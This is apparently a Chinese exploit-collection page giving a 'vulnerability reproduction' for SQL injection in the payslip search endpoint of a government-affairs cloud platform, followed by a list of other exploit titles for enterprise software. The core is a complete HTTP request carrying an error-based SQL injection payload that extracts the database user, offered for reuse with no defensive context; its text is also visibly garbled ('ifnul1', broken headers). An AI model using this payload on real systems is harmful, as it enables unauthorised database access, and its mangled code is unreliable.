S37-1数字通指尖云平台-智慧政务payslip-SQL

漏洞复现：

payload：

GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=SELECT 4050
FROM(SELECT COUNT(*),CONCAT((mid((ifnul1(cast(current_user() as nchar),0x2
0)),1,54)),FLOOR(RAND(0*2))x FROM INFORMATION_SCHEMA,PLUGINS GROUP BY X)a)  HTTP/1.1
Host:xx.xx.xx.x
User-Agent: Mozilla/5,0 (Macintosh; Intel Mac S X 10,15; rv:109,0) Gecko/201
00101 Firefox/117.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,imag
e/webp,*/*;q=8.8
Accept-Language: zh-CN,zh;q=0.8,zh-Tw;g=0.7,zh-HK;g-0.5,en-US;g=0.3,en;g-0.2
Accept-Encoding: gzip，deflate
Connection: close
Cookie: GOASESSID=i589f58naalabocmbidup7edl3
Upgrade-Insecure-Requests: 1

Menu

Share

S37-1数字通指尖云平台-智慧政务payslip-SQL

S37-1数字通指尖云平台-智慧政务payslip-SQL

漏洞复现：

Comment

Z22-1正方-移动信息服务管理系统-任意文件上传

Z20-1ZoneMinder--SQL

Z17-2紫光-电子档案管理系统-InformationLeakage

P5-2平升-电子水库监测管理平台-SQL

M3-2明源云-ERP系统接口管家-任意文件上传

用友U8Cloud-RepAddToTaskAction-SQL注入

蓝凌OAsysUiComponent未授权复制

Q14-1群杰-印章物联网管理平台-PermissionAC

Y4-21用友-NC-XXE

泛微ecology-v9-ModeDateService-SQL注入